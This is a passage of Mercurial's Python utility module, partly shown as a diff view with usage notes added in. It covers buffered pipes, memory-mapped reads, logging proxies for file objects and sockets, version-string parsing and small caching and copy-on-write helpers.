386 The data are removed from the buffer."""
384 The data are removed from the buffer."""
387 if size == 0 or not self._buffer:
385 if size == 0 or not self._buffer:
388 return ''
386 return ''
389 buf = self._buffer[0]
387 buf = self._buffer[0]
390 if 1 < len(self._buffer):
388 if 1 < len(self._buffer):
391 buf = ''.join(self._buffer)
389 buf = ''.join(self._buffer)
392
390
393 data = buf[:size]
391 data = buf[:size]
394 buf = buf[len(data):]
392 buf = buf[len(data):]
395 if buf:
393 if buf:
396 self._buffer = [buf]
394 self._buffer = [buf]
397 self._lenbuf = len(buf)
395 self._lenbuf = len(buf)
398 else:
396 else:
399 self._buffer = []
397 self._buffer = []
400 self._lenbuf = 0
398 self._lenbuf = 0
401 return data
399 return data
402
400
403 def _fillbuffer(self):
401 def _fillbuffer(self):
404 """read data to the buffer"""
402 """read data to the buffer"""
405 data = os.read(self._input.fileno(), _chunksize)
403 data = os.read(self._input.fileno(), _chunksize)
406 if not data:
404 if not data:
407 self._eof = True
405 self._eof = True
408 else:
406 else:
409 self._lenbuf += len(data)
407 self._lenbuf += len(data)
410 self._buffer.append(data)
408 self._buffer.append(data)
411
409
412 return data
410 return data
413
411
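A sketch of the intended usage (command illustrative): consult hasbuffer before polling, so already-buffered data isn't missed by select().

import select, subprocess
proc = subprocess.Popen(['hg', 'serve', '--stdio'], stdout=subprocess.PIPE)
pipe = bufferedinputpipe(proc.stdout)
if pipe.hasbuffer or select.select([pipe], [], [], 1.0)[0]:
    line = pipe.readline()      # efficient in-buffer readline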
414 def mmapread(fp):
412 def mmapread(fp):
415 try:
413 try:
416 fd = getattr(fp, 'fileno', lambda: fp)()
414 fd = getattr(fp, 'fileno', lambda: fp)()
417 return mmap.mmap(fd, 0, access=mmap.ACCESS_READ)
415 return mmap.mmap(fd, 0, access=mmap.ACCESS_READ)
418 except ValueError:
416 except ValueError:
419 # Empty files cannot be mmapped, but mmapread should still work. Check
417 # Empty files cannot be mmapped, but mmapread should still work. Check
420 # if the file is empty, and if so, return an empty buffer.
418 # if the file is empty, and if so, return an empty buffer.
421 if os.fstat(fd).st_size == 0:
419 if os.fstat(fd).st_size == 0:
422 return ''
420 return ''
423 raise
421 raise
424
422
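For example (path illustrative), mapping a file read-only and slicing it lazily:

with open('data.bin', 'rb') as fp:
    buf = mmapread(fp)          # mmap object, or '' for an empty file
    header = buf[:4]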
425 class fileobjectproxy(object):
423 class fileobjectproxy(object):
426 """A proxy around file objects that tells a watcher when events occur.
424 """A proxy around file objects that tells a watcher when events occur.
427
425
428 This type is intended to only be used for testing purposes. Think hard
426 This type is intended to only be used for testing purposes. Think hard
429 before using it in important code.
427 before using it in important code.
430 """
428 """
431 __slots__ = (
429 __slots__ = (
432 r'_orig',
430 r'_orig',
433 r'_observer',
431 r'_observer',
434 )
432 )
435
433
436 def __init__(self, fh, observer):
434 def __init__(self, fh, observer):
437 object.__setattr__(self, r'_orig', fh)
435 object.__setattr__(self, r'_orig', fh)
438 object.__setattr__(self, r'_observer', observer)
436 object.__setattr__(self, r'_observer', observer)
439
437
440 def __getattribute__(self, name):
438 def __getattribute__(self, name):
441 ours = {
439 ours = {
442 r'_observer',
440 r'_observer',
443
441
444 # IOBase
442 # IOBase
445 r'close',
443 r'close',
446 # closed if a property
444 # closed if a property
447 r'fileno',
445 r'fileno',
448 r'flush',
446 r'flush',
449 r'isatty',
447 r'isatty',
450 r'readable',
448 r'readable',
451 r'readline',
449 r'readline',
452 r'readlines',
450 r'readlines',
453 r'seek',
451 r'seek',
454 r'seekable',
452 r'seekable',
455 r'tell',
453 r'tell',
456 r'truncate',
454 r'truncate',
457 r'writable',
455 r'writable',
458 r'writelines',
456 r'writelines',
459 # RawIOBase
457 # RawIOBase
460 r'read',
458 r'read',
461 r'readall',
459 r'readall',
462 r'readinto',
460 r'readinto',
463 r'write',
461 r'write',
464 # BufferedIOBase
462 # BufferedIOBase
465 # raw is a property
463 # raw is a property
466 r'detach',
464 r'detach',
467 # read defined above
465 # read defined above
468 r'read1',
466 r'read1',
469 # readinto defined above
467 # readinto defined above
470 # write defined above
468 # write defined above
471 }
469 }
472
470
473 # We only observe some methods.
471 # We only observe some methods.
474 if name in ours:
472 if name in ours:
475 return object.__getattribute__(self, name)
473 return object.__getattribute__(self, name)
476
474
477 return getattr(object.__getattribute__(self, r'_orig'), name)
475 return getattr(object.__getattribute__(self, r'_orig'), name)
478
476
479 def __nonzero__(self):
477 def __nonzero__(self):
480 return bool(object.__getattribute__(self, r'_orig'))
478 return bool(object.__getattribute__(self, r'_orig'))
481
479
482 __bool__ = __nonzero__
480 __bool__ = __nonzero__
483
481
484 def __delattr__(self, name):
482 def __delattr__(self, name):
485 return delattr(object.__getattribute__(self, r'_orig'), name)
483 return delattr(object.__getattribute__(self, r'_orig'), name)
486
484
487 def __setattr__(self, name, value):
485 def __setattr__(self, name, value):
488 return setattr(object.__getattribute__(self, r'_orig'), name, value)
486 return setattr(object.__getattribute__(self, r'_orig'), name, value)
489
487
490 def __iter__(self):
488 def __iter__(self):
491 return object.__getattribute__(self, r'_orig').__iter__()
489 return object.__getattribute__(self, r'_orig').__iter__()
492
490
493 def _observedcall(self, name, *args, **kwargs):
491 def _observedcall(self, name, *args, **kwargs):
494 # Call the original object.
492 # Call the original object.
495 orig = object.__getattribute__(self, r'_orig')
493 orig = object.__getattribute__(self, r'_orig')
496 res = getattr(orig, name)(*args, **kwargs)
494 res = getattr(orig, name)(*args, **kwargs)
497
495
498 # Call a method on the observer of the same name with arguments
496 # Call a method on the observer of the same name with arguments
499 # so it can react, log, etc.
497 # so it can react, log, etc.
500 observer = object.__getattribute__(self, r'_observer')
498 observer = object.__getattribute__(self, r'_observer')
501 fn = getattr(observer, name, None)
499 fn = getattr(observer, name, None)
502 if fn:
500 if fn:
503 fn(res, *args, **kwargs)
501 fn(res, *args, **kwargs)
504
502
505 return res
503 return res
506
504
507 def close(self, *args, **kwargs):
505 def close(self, *args, **kwargs):
508 return object.__getattribute__(self, r'_observedcall')(
506 return object.__getattribute__(self, r'_observedcall')(
509 r'close', *args, **kwargs)
507 r'close', *args, **kwargs)
510
508
511 def fileno(self, *args, **kwargs):
509 def fileno(self, *args, **kwargs):
512 return object.__getattribute__(self, r'_observedcall')(
510 return object.__getattribute__(self, r'_observedcall')(
513 r'fileno', *args, **kwargs)
511 r'fileno', *args, **kwargs)
514
512
515 def flush(self, *args, **kwargs):
513 def flush(self, *args, **kwargs):
516 return object.__getattribute__(self, r'_observedcall')(
514 return object.__getattribute__(self, r'_observedcall')(
517 r'flush', *args, **kwargs)
515 r'flush', *args, **kwargs)
518
516
519 def isatty(self, *args, **kwargs):
517 def isatty(self, *args, **kwargs):
520 return object.__getattribute__(self, r'_observedcall')(
518 return object.__getattribute__(self, r'_observedcall')(
521 r'isatty', *args, **kwargs)
519 r'isatty', *args, **kwargs)
522
520
523 def readable(self, *args, **kwargs):
521 def readable(self, *args, **kwargs):
524 return object.__getattribute__(self, r'_observedcall')(
522 return object.__getattribute__(self, r'_observedcall')(
525 r'readable', *args, **kwargs)
523 r'readable', *args, **kwargs)
526
524
527 def readline(self, *args, **kwargs):
525 def readline(self, *args, **kwargs):
528 return object.__getattribute__(self, r'_observedcall')(
526 return object.__getattribute__(self, r'_observedcall')(
529 r'readline', *args, **kwargs)
527 r'readline', *args, **kwargs)
530
528
531 def readlines(self, *args, **kwargs):
529 def readlines(self, *args, **kwargs):
532 return object.__getattribute__(self, r'_observedcall')(
530 return object.__getattribute__(self, r'_observedcall')(
533 r'readlines', *args, **kwargs)
531 r'readlines', *args, **kwargs)
534
532
535 def seek(self, *args, **kwargs):
533 def seek(self, *args, **kwargs):
536 return object.__getattribute__(self, r'_observedcall')(
534 return object.__getattribute__(self, r'_observedcall')(
537 r'seek', *args, **kwargs)
535 r'seek', *args, **kwargs)
538
536
539 def seekable(self, *args, **kwargs):
537 def seekable(self, *args, **kwargs):
540 return object.__getattribute__(self, r'_observedcall')(
538 return object.__getattribute__(self, r'_observedcall')(
541 r'seekable', *args, **kwargs)
539 r'seekable', *args, **kwargs)
542
540
543 def tell(self, *args, **kwargs):
541 def tell(self, *args, **kwargs):
544 return object.__getattribute__(self, r'_observedcall')(
542 return object.__getattribute__(self, r'_observedcall')(
545 r'tell', *args, **kwargs)
543 r'tell', *args, **kwargs)
546
544
547 def truncate(self, *args, **kwargs):
545 def truncate(self, *args, **kwargs):
548 return object.__getattribute__(self, r'_observedcall')(
546 return object.__getattribute__(self, r'_observedcall')(
549 r'truncate', *args, **kwargs)
547 r'truncate', *args, **kwargs)
550
548
551 def writable(self, *args, **kwargs):
549 def writable(self, *args, **kwargs):
552 return object.__getattribute__(self, r'_observedcall')(
550 return object.__getattribute__(self, r'_observedcall')(
553 r'writable', *args, **kwargs)
551 r'writable', *args, **kwargs)
554
552
555 def writelines(self, *args, **kwargs):
553 def writelines(self, *args, **kwargs):
556 return object.__getattribute__(self, r'_observedcall')(
554 return object.__getattribute__(self, r'_observedcall')(
557 r'writelines', *args, **kwargs)
555 r'writelines', *args, **kwargs)
558
556
559 def read(self, *args, **kwargs):
557 def read(self, *args, **kwargs):
560 return object.__getattribute__(self, r'_observedcall')(
558 return object.__getattribute__(self, r'_observedcall')(
561 r'read', *args, **kwargs)
559 r'read', *args, **kwargs)
562
560
563 def readall(self, *args, **kwargs):
561 def readall(self, *args, **kwargs):
564 return object.__getattribute__(self, r'_observedcall')(
562 return object.__getattribute__(self, r'_observedcall')(
565 r'readall', *args, **kwargs)
563 r'readall', *args, **kwargs)
566
564
567 def readinto(self, *args, **kwargs):
565 def readinto(self, *args, **kwargs):
568 return object.__getattribute__(self, r'_observedcall')(
566 return object.__getattribute__(self, r'_observedcall')(
569 r'readinto', *args, **kwargs)
567 r'readinto', *args, **kwargs)
570
568
571 def write(self, *args, **kwargs):
569 def write(self, *args, **kwargs):
572 return object.__getattribute__(self, r'_observedcall')(
570 return object.__getattribute__(self, r'_observedcall')(
573 r'write', *args, **kwargs)
571 r'write', *args, **kwargs)
574
572
575 def detach(self, *args, **kwargs):
573 def detach(self, *args, **kwargs):
576 return object.__getattribute__(self, r'_observedcall')(
574 return object.__getattribute__(self, r'_observedcall')(
577 r'detach', *args, **kwargs)
575 r'detach', *args, **kwargs)
578
576
579 def read1(self, *args, **kwargs):
577 def read1(self, *args, **kwargs):
580 return object.__getattribute__(self, r'_observedcall')(
578 return object.__getattribute__(self, r'_observedcall')(
581 r'read1', *args, **kwargs)
579 r'read1', *args, **kwargs)
582
580
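A sketch of wiring this to the fileobjectobserver defined further down (paths and names illustrative):

logfh = open('io.log', 'w')
observer = fileobjectobserver(logfh, 'stdin', reads=True, writes=False)
proxied = fileobjectproxy(open('input.bin', 'rb'), observer)
data = proxied.read(16)   # the real read happens, then the observer
                          # logs "stdin> read(16) -> <bytes read>"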
583 class observedbufferedinputpipe(bufferedinputpipe):
581 class observedbufferedinputpipe(bufferedinputpipe):
584 """A variation of bufferedinputpipe that is aware of fileobjectproxy.
582 """A variation of bufferedinputpipe that is aware of fileobjectproxy.
585
583
586 ``bufferedinputpipe`` makes low-level calls to ``os.read()`` that
584 ``bufferedinputpipe`` makes low-level calls to ``os.read()`` that
587 bypass ``fileobjectproxy``. Because of this, we need to make
585 bypass ``fileobjectproxy``. Because of this, we need to make
588 ``bufferedinputpipe`` aware of these operations.
586 ``bufferedinputpipe`` aware of these operations.
589
587
590 This variation of ``bufferedinputpipe`` can notify observers about
588 This variation of ``bufferedinputpipe`` can notify observers about
591 ``os.read()`` events. It also re-publishes other events, such as
589 ``os.read()`` events. It also re-publishes other events, such as
592 ``read()`` and ``readline()``.
590 ``read()`` and ``readline()``.
593 """
591 """
594 def _fillbuffer(self):
592 def _fillbuffer(self):
595 res = super(observedbufferedinputpipe, self)._fillbuffer()
593 res = super(observedbufferedinputpipe, self)._fillbuffer()
596
594
597 fn = getattr(self._input._observer, r'osread', None)
595 fn = getattr(self._input._observer, r'osread', None)
598 if fn:
596 if fn:
599 fn(res, _chunksize)
597 fn(res, _chunksize)
600
598
601 return res
599 return res
602
600
603 # We use different observer methods because the operation isn't
601 # We use different observer methods because the operation isn't
604 # performed on the actual file object but on us.
602 # performed on the actual file object but on us.
605 def read(self, size):
603 def read(self, size):
606 res = super(observedbufferedinputpipe, self).read(size)
604 res = super(observedbufferedinputpipe, self).read(size)
607
605
608 fn = getattr(self._input._observer, r'bufferedread', None)
606 fn = getattr(self._input._observer, r'bufferedread', None)
609 if fn:
607 if fn:
610 fn(res, size)
608 fn(res, size)
611
609
612 return res
610 return res
613
611
614 def readline(self, *args, **kwargs):
612 def readline(self, *args, **kwargs):
615 res = super(observedbufferedinputpipe, self).readline(*args, **kwargs)
613 res = super(observedbufferedinputpipe, self).readline(*args, **kwargs)
616
614
617 fn = getattr(self._input._observer, r'bufferedreadline', None)
615 fn = getattr(self._input._observer, r'bufferedreadline', None)
618 if fn:
616 if fn:
619 fn(res)
617 fn(res)
620
618
621 return res
619 return res
622
620
623 PROXIED_SOCKET_METHODS = {
621 PROXIED_SOCKET_METHODS = {
624 r'makefile',
622 r'makefile',
625 r'recv',
623 r'recv',
626 r'recvfrom',
624 r'recvfrom',
627 r'recvfrom_into',
625 r'recvfrom_into',
628 r'recv_into',
626 r'recv_into',
629 r'send',
627 r'send',
630 r'sendall',
628 r'sendall',
631 r'sendto',
629 r'sendto',
632 r'setblocking',
630 r'setblocking',
633 r'settimeout',
631 r'settimeout',
634 r'gettimeout',
632 r'gettimeout',
635 r'setsockopt',
633 r'setsockopt',
636 }
634 }
637
635
638 class socketproxy(object):
636 class socketproxy(object):
639 """A proxy around a socket that tells a watcher when events occur.
637 """A proxy around a socket that tells a watcher when events occur.
640
638
641 This is like ``fileobjectproxy`` except for sockets.
639 This is like ``fileobjectproxy`` except for sockets.
642
640
643 This type is intended to only be used for testing purposes. Think hard
641 This type is intended to only be used for testing purposes. Think hard
644 before using it in important code.
642 before using it in important code.
645 """
643 """
646 __slots__ = (
644 __slots__ = (
647 r'_orig',
645 r'_orig',
648 r'_observer',
646 r'_observer',
649 )
647 )
650
648
651 def __init__(self, sock, observer):
649 def __init__(self, sock, observer):
652 object.__setattr__(self, r'_orig', sock)
650 object.__setattr__(self, r'_orig', sock)
653 object.__setattr__(self, r'_observer', observer)
651 object.__setattr__(self, r'_observer', observer)
654
652
655 def __getattribute__(self, name):
653 def __getattribute__(self, name):
656 if name in PROXIED_SOCKET_METHODS:
654 if name in PROXIED_SOCKET_METHODS:
657 return object.__getattribute__(self, name)
655 return object.__getattribute__(self, name)
658
656
659 return getattr(object.__getattribute__(self, r'_orig'), name)
657 return getattr(object.__getattribute__(self, r'_orig'), name)
660
658
661 def __delattr__(self, name):
659 def __delattr__(self, name):
662 return delattr(object.__getattribute__(self, r'_orig'), name)
660 return delattr(object.__getattribute__(self, r'_orig'), name)
663
661
664 def __setattr__(self, name, value):
662 def __setattr__(self, name, value):
665 return setattr(object.__getattribute__(self, r'_orig'), name, value)
663 return setattr(object.__getattribute__(self, r'_orig'), name, value)
666
664
667 def __nonzero__(self):
665 def __nonzero__(self):
668 return bool(object.__getattribute__(self, r'_orig'))
666 return bool(object.__getattribute__(self, r'_orig'))
669
667
670 __bool__ = __nonzero__
668 __bool__ = __nonzero__
671
669
672 def _observedcall(self, name, *args, **kwargs):
670 def _observedcall(self, name, *args, **kwargs):
673 # Call the original object.
671 # Call the original object.
674 orig = object.__getattribute__(self, r'_orig')
672 orig = object.__getattribute__(self, r'_orig')
675 res = getattr(orig, name)(*args, **kwargs)
673 res = getattr(orig, name)(*args, **kwargs)
676
674
677 # Call a method on the observer of the same name with arguments
675 # Call a method on the observer of the same name with arguments
678 # so it can react, log, etc.
676 # so it can react, log, etc.
679 observer = object.__getattribute__(self, r'_observer')
677 observer = object.__getattribute__(self, r'_observer')
680 fn = getattr(observer, name, None)
678 fn = getattr(observer, name, None)
681 if fn:
679 if fn:
682 fn(res, *args, **kwargs)
680 fn(res, *args, **kwargs)
683
681
684 return res
682 return res
685
683
686 def makefile(self, *args, **kwargs):
684 def makefile(self, *args, **kwargs):
687 res = object.__getattribute__(self, r'_observedcall')(
685 res = object.__getattribute__(self, r'_observedcall')(
688 r'makefile', *args, **kwargs)
686 r'makefile', *args, **kwargs)
689
687
690 # The file object may be used for I/O. So we turn it into a
688 # The file object may be used for I/O. So we turn it into a
691 # proxy using our observer.
689 # proxy using our observer.
692 observer = object.__getattribute__(self, r'_observer')
690 observer = object.__getattribute__(self, r'_observer')
693 return makeloggingfileobject(observer.fh, res, observer.name,
691 return makeloggingfileobject(observer.fh, res, observer.name,
694 reads=observer.reads,
692 reads=observer.reads,
695 writes=observer.writes,
693 writes=observer.writes,
696 logdata=observer.logdata,
694 logdata=observer.logdata,
697 logdataapis=observer.logdataapis)
695 logdataapis=observer.logdataapis)
698
696
699 def recv(self, *args, **kwargs):
697 def recv(self, *args, **kwargs):
700 return object.__getattribute__(self, r'_observedcall')(
698 return object.__getattribute__(self, r'_observedcall')(
701 r'recv', *args, **kwargs)
699 r'recv', *args, **kwargs)
702
700
703 def recvfrom(self, *args, **kwargs):
701 def recvfrom(self, *args, **kwargs):
704 return object.__getattribute__(self, r'_observedcall')(
702 return object.__getattribute__(self, r'_observedcall')(
705 r'recvfrom', *args, **kwargs)
703 r'recvfrom', *args, **kwargs)
706
704
707 def recvfrom_into(self, *args, **kwargs):
705 def recvfrom_into(self, *args, **kwargs):
708 return object.__getattribute__(self, r'_observedcall')(
706 return object.__getattribute__(self, r'_observedcall')(
709 r'recvfrom_into', *args, **kwargs)
707 r'recvfrom_into', *args, **kwargs)
710
708
711 def recv_into(self, *args, **kwargs):
709 def recv_into(self, *args, **kwargs):
712 return object.__getattribute__(self, r'_observedcall')(
710 return object.__getattribute__(self, r'_observedcall')(
713 r'recv_into', *args, **kwargs)
711 r'recv_into', *args, **kwargs)
714
712
715 def send(self, *args, **kwargs):
713 def send(self, *args, **kwargs):
716 return object.__getattribute__(self, r'_observedcall')(
714 return object.__getattribute__(self, r'_observedcall')(
717 r'send', *args, **kwargs)
715 r'send', *args, **kwargs)
718
716
719 def sendall(self, *args, **kwargs):
717 def sendall(self, *args, **kwargs):
720 return object.__getattribute__(self, r'_observedcall')(
718 return object.__getattribute__(self, r'_observedcall')(
721 r'sendall', *args, **kwargs)
719 r'sendall', *args, **kwargs)
722
720
723 def sendto(self, *args, **kwargs):
721 def sendto(self, *args, **kwargs):
724 return object.__getattribute__(self, r'_observedcall')(
722 return object.__getattribute__(self, r'_observedcall')(
725 r'sendto', *args, **kwargs)
723 r'sendto', *args, **kwargs)
726
724
727 def setblocking(self, *args, **kwargs):
725 def setblocking(self, *args, **kwargs):
728 return object.__getattribute__(self, r'_observedcall')(
726 return object.__getattribute__(self, r'_observedcall')(
729 r'setblocking', *args, **kwargs)
727 r'setblocking', *args, **kwargs)
730
728
731 def settimeout(self, *args, **kwargs):
729 def settimeout(self, *args, **kwargs):
732 return object.__getattribute__(self, r'_observedcall')(
730 return object.__getattribute__(self, r'_observedcall')(
733 r'settimeout', *args, **kwargs)
731 r'settimeout', *args, **kwargs)
734
732
735 def gettimeout(self, *args, **kwargs):
733 def gettimeout(self, *args, **kwargs):
736 return object.__getattribute__(self, r'_observedcall')(
734 return object.__getattribute__(self, r'_observedcall')(
737 r'gettimeout', *args, **kwargs)
735 r'gettimeout', *args, **kwargs)
738
736
739 def setsockopt(self, *args, **kwargs):
737 def setsockopt(self, *args, **kwargs):
740 return object.__getattribute__(self, r'_observedcall')(
738 return object.__getattribute__(self, r'_observedcall')(
741 r'setsockopt', *args, **kwargs)
739 r'setsockopt', *args, **kwargs)
742
740
class baseproxyobserver(object):
    def _writedata(self, data):
        if not self.logdata:
            if self.logdataapis:
                self.fh.write('\n')
                self.fh.flush()
            return

        # Simple case writes all data on a single line.
        if b'\n' not in data:
            if self.logdataapis:
                self.fh.write(': %s\n' % stringutil.escapestr(data))
            else:
                self.fh.write('%s> %s\n'
                              % (self.name, stringutil.escapestr(data)))
            self.fh.flush()
            return

        # Data with newlines is written to multiple lines.
        if self.logdataapis:
            self.fh.write(':\n')

        lines = data.splitlines(True)
        for line in lines:
            self.fh.write('%s> %s\n'
                          % (self.name, stringutil.escapestr(line)))
        self.fh.flush()

class fileobjectobserver(baseproxyobserver):
    """Logs file object activity."""
    def __init__(self, fh, name, reads=True, writes=True, logdata=False,
                 logdataapis=True):
        self.fh = fh
        self.name = name
        self.logdata = logdata
        self.logdataapis = logdataapis
        self.reads = reads
        self.writes = writes

    def read(self, res, size=-1):
        if not self.reads:
            return
        # Python 3 can return None from reads at EOF instead of empty strings.
        if res is None:
            res = ''

        if self.logdataapis:
            self.fh.write('%s> read(%d) -> %d' % (self.name, size, len(res)))

        self._writedata(res)

    def readline(self, res, limit=-1):
        if not self.reads:
            return

        if self.logdataapis:
            self.fh.write('%s> readline() -> %d' % (self.name, len(res)))

        self._writedata(res)

    def readinto(self, res, dest):
        if not self.reads:
            return

        if self.logdataapis:
            self.fh.write('%s> readinto(%d) -> %r' % (self.name, len(dest),
                                                      res))

        data = dest[0:res] if res is not None else b''
        self._writedata(data)

    def write(self, res, data):
        if not self.writes:
            return

        # Python 2 returns None from some write() calls. Python 3 (reasonably)
        # returns the integer bytes written.
        if res is None and data:
            res = len(data)

        if self.logdataapis:
            self.fh.write('%s> write(%d) -> %r' % (self.name, len(data), res))

        self._writedata(data)

    def flush(self, res):
        if not self.writes:
            return

        self.fh.write('%s> flush() -> %r\n' % (self.name, res))

    # For observedbufferedinputpipe.
    def bufferedread(self, res, size):
        if not self.reads:
            return

        if self.logdataapis:
            self.fh.write('%s> bufferedread(%d) -> %d' % (
                self.name, size, len(res)))

        self._writedata(res)

    def bufferedreadline(self, res):
        if not self.reads:
            return

        if self.logdataapis:
            self.fh.write('%s> bufferedreadline() -> %d' % (
                self.name, len(res)))

        self._writedata(res)

def makeloggingfileobject(logh, fh, name, reads=True, writes=True,
                          logdata=False, logdataapis=True):
    """Turn a file object into a logging file object."""

    observer = fileobjectobserver(logh, name, reads=reads, writes=writes,
                                  logdata=logdata, logdataapis=logdataapis)
    return fileobjectproxy(fh, observer)

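# Usage sketch (hedged, not part of the module's API surface): wrap a file
# object so every read and write is mirrored to a log stream. ``logfh`` and
# ``pipe`` below are assumptions standing in for any writable log handle
# and any observed file object.
#
#   proxy = makeloggingfileobject(logfh, pipe, b'remote', logdata=True)
#   proxy.readline()   # forwarded to pipe; logfh gets a line like
#                      # "remote> readline() -> 12: hello world"
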
class socketobserver(baseproxyobserver):
    """Logs socket activity."""
    def __init__(self, fh, name, reads=True, writes=True, states=True,
                 logdata=False, logdataapis=True):
        self.fh = fh
        self.name = name
        self.reads = reads
        self.writes = writes
        self.states = states
        self.logdata = logdata
        self.logdataapis = logdataapis

    def makefile(self, res, mode=None, bufsize=None):
        if not self.states:
            return

        self.fh.write('%s> makefile(%r, %r)\n' % (
            self.name, mode, bufsize))

    def recv(self, res, size, flags=0):
        if not self.reads:
            return

        if self.logdataapis:
            self.fh.write('%s> recv(%d, %d) -> %d' % (
                self.name, size, flags, len(res)))
        self._writedata(res)

    def recvfrom(self, res, size, flags=0):
        if not self.reads:
            return

        if self.logdataapis:
            self.fh.write('%s> recvfrom(%d, %d) -> %d' % (
                self.name, size, flags, len(res[0])))

        self._writedata(res[0])

    def recvfrom_into(self, res, buf, size, flags=0):
        if not self.reads:
            return

        if self.logdataapis:
            self.fh.write('%s> recvfrom_into(%d, %d) -> %d' % (
                self.name, size, flags, res[0]))

        self._writedata(buf[0:res[0]])

    def recv_into(self, res, buf, size=0, flags=0):
        if not self.reads:
            return

        if self.logdataapis:
            self.fh.write('%s> recv_into(%d, %d) -> %d' % (
                self.name, size, flags, res))

        self._writedata(buf[0:res])

    def send(self, res, data, flags=0):
        if not self.writes:
            return

        # socket.send() returns the number of bytes written, so ``res`` is
        # an integer; the previous len(res) here would raise TypeError.
        self.fh.write('%s> send(%d, %d) -> %d' % (
            self.name, len(data), flags, res))
        self._writedata(data)

    def sendall(self, res, data, flags=0):
        if not self.writes:
            return

        if self.logdataapis:
            # Returns None on success. So don't bother reporting return value.
            self.fh.write('%s> sendall(%d, %d)' % (
                self.name, len(data), flags))

        self._writedata(data)

    def sendto(self, res, data, flagsoraddress, address=None):
        if not self.writes:
            return

        if address:
            flags = flagsoraddress
        else:
            flags = 0

        if self.logdataapis:
            self.fh.write('%s> sendto(%d, %d, %r) -> %d' % (
                self.name, len(data), flags, address, res))

        self._writedata(data)

    def setblocking(self, res, flag):
        if not self.states:
            return

        self.fh.write('%s> setblocking(%r)\n' % (self.name, flag))

    def settimeout(self, res, value):
        if not self.states:
            return

        self.fh.write('%s> settimeout(%r)\n' % (self.name, value))

    def gettimeout(self, res):
        if not self.states:
            return

        self.fh.write('%s> gettimeout() -> %f\n' % (self.name, res))

    def setsockopt(self, res, level, optname, value):
        if not self.states:
            return

        # Like the other observer methods, this receives the proxied call's
        # return value first; the original signature omitted ``res``, which
        # left the '-> %r' placeholder in the format string unfilled.
        self.fh.write('%s> setsockopt(%r, %r, %r) -> %r\n' % (
            self.name, level, optname, value, res))

def makeloggingsocket(logh, fh, name, reads=True, writes=True, states=True,
                      logdata=False, logdataapis=True):
    """Turn a socket into a logging socket."""

    observer = socketobserver(logh, name, reads=reads, writes=writes,
                              states=states, logdata=logdata,
                              logdataapis=logdataapis)
    return socketproxy(fh, observer)

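# Usage sketch (hedged): observe traffic on a live socket. ``logfh`` is an
# assumption for any writable log stream; the wrapped object behaves like
# the original socket.
#
#   import socket
#   sock = socket.create_connection(('example.com', 80))
#   sock = makeloggingsocket(logfh, sock, b'conn0', logdata=True)
#   sock.sendall(b'HEAD / HTTP/1.0\r\n\r\n')   # logged, then forwarded
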
def version():
    """Return version information if available."""
    try:
        from . import __version__
        return __version__.version
    except ImportError:
        return 'unknown'

def versiontuple(v=None, n=4):
    """Parses a Mercurial version string into an N-tuple.

    The version string to be parsed is specified with the ``v`` argument.
    If it isn't defined, the current Mercurial version string will be parsed.

    ``n`` can be 2, 3, or 4. Here is how some version strings map to
    returned values:

    >>> v = b'3.6.1+190-df9b73d2d444'
    >>> versiontuple(v, 2)
    (3, 6)
    >>> versiontuple(v, 3)
    (3, 6, 1)
    >>> versiontuple(v, 4)
    (3, 6, 1, '190-df9b73d2d444')

    >>> versiontuple(b'3.6.1+190-df9b73d2d444+20151118')
    (3, 6, 1, '190-df9b73d2d444+20151118')

    >>> v = b'3.6'
    >>> versiontuple(v, 2)
    (3, 6)
    >>> versiontuple(v, 3)
    (3, 6, None)
    >>> versiontuple(v, 4)
    (3, 6, None, None)

    >>> v = b'3.9-rc'
    >>> versiontuple(v, 2)
    (3, 9)
    >>> versiontuple(v, 3)
    (3, 9, None)
    >>> versiontuple(v, 4)
    (3, 9, None, 'rc')

    >>> v = b'3.9-rc+2-02a8fea4289b'
    >>> versiontuple(v, 2)
    (3, 9)
    >>> versiontuple(v, 3)
    (3, 9, None)
    >>> versiontuple(v, 4)
    (3, 9, None, 'rc+2-02a8fea4289b')

    >>> versiontuple(b'4.6rc0')
    (4, 6, None, 'rc0')
    >>> versiontuple(b'4.6rc0+12-425d55e54f98')
    (4, 6, None, 'rc0+12-425d55e54f98')
    >>> versiontuple(b'.1.2.3')
    (None, None, None, '.1.2.3')
    >>> versiontuple(b'12.34..5')
    (12, 34, None, '..5')
    >>> versiontuple(b'1.2.3.4.5.6')
    (1, 2, 3, '.4.5.6')
    """
    if not v:
        v = version()
    m = remod.match(br'(\d+(?:\.\d+){,2})[\+-]?(.*)', v)
    if not m:
        vparts, extra = '', v
    elif m.group(2):
        vparts, extra = m.groups()
    else:
        vparts, extra = m.group(1), None

    vints = []
    for i in vparts.split('.'):
        try:
            vints.append(int(i))
        except ValueError:
            break
    # (3, 6) -> (3, 6, None)
    while len(vints) < 3:
        vints.append(None)

    if n == 2:
        return (vints[0], vints[1])
    if n == 3:
        return (vints[0], vints[1], vints[2])
    if n == 4:
        return (vints[0], vints[1], vints[2], extra)

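# A common pattern (a hedged sketch, not from this module, assuming the
# running version is parseable) is gating version-dependent behavior on the
# first two components:
#
#   if versiontuple(n=2) >= (4, 6):
#       pass  # safe to rely on APIs introduced in 4.6
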
def cachefunc(func):
    '''cache the result of function calls'''
    # XXX doesn't handle keywords args
    if func.__code__.co_argcount == 0:
        cache = []
        def f():
            if len(cache) == 0:
                cache.append(func())
            return cache[0]
        return f
    cache = {}
    if func.__code__.co_argcount == 1:
        # we gain a small amount of time because
        # we don't need to pack/unpack the list
        def f(arg):
            if arg not in cache:
                cache[arg] = func(arg)
            return cache[arg]
    else:
        def f(*args):
            if args not in cache:
                cache[args] = func(*args)
            return cache[args]

    return f

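# Illustration in the doctest style used elsewhere in this file (a hedged
# sketch; ``calls`` and ``square`` are made-up names):
#
# >>> calls = []
# >>> def square(x):
# ...     calls.append(x)
# ...     return x * x
# >>> csquare = cachefunc(square)
# >>> csquare(3), csquare(3)
# (9, 9)
# >>> calls  # the wrapped function ran only once; this cache never evicts
# [3]
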
class cow(object):
    """helper class to make copy-on-write easier

    Call preparewrite before doing any writes.
    """

    def preparewrite(self):
        """call this before writes, return self or a copied new object"""
        if getattr(self, '_copied', 0):
            self._copied -= 1
            return self.__class__(self)
        return self

    def copy(self):
        """always do a cheap copy"""
        self._copied = getattr(self, '_copied', 0) + 1
        return self

class sortdict(collections.OrderedDict):
    '''a simple sorted dictionary

    >>> d1 = sortdict([(b'a', 0), (b'b', 1)])
    >>> d2 = d1.copy()
    >>> d2
    sortdict([('a', 0), ('b', 1)])
    >>> d2.update([(b'a', 2)])
    >>> list(d2.keys()) # should still be in last-set order
    ['b', 'a']
    '''

    def __setitem__(self, key, value):
        if key in self:
